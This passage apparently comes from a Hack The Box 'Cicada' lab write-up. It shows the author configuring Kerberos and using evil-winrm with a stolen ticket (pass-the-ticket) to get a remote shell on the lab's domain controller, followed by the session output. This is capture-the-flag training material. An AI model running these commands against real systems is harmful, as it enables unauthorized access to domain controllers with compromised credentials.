WinRM
The emily.oscars user has been compromised and TGT was generated. The user has a |membership to the Remote Management Users group, allowing the user to WinRM to the target system. This was enumerated from LDAPDomainDump and BloodHound
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ echo -e '[realms]\n\n\tCICADA.HTB = {\n\t\tkdc = cicada-dc.cicada.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
CICADA.HTB = {
kdc = cicada-dc.cicada.htb
}Setting up the /etc/krb5.conf file forpass_the_ticket
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ KRB5CCNAME=emily.oscars@cicada-dc.cicada.htb.ccache evil-winrm -r CICADA.HTB -i cicada-dc.cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::29
IPv6 Address. . . . . . . . . . . : dead:beef::46c0:3971:5ebf:3844
Link-local IPv6 Address . . . . . : fe80::f65a:ca26:f7f6:2508%6
IPv4 Address. . . . . . . . . . . : 10.129.41.192
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%6
10.129.0.1Initial Foothold established to the target system as the emily.oscars user via WinRM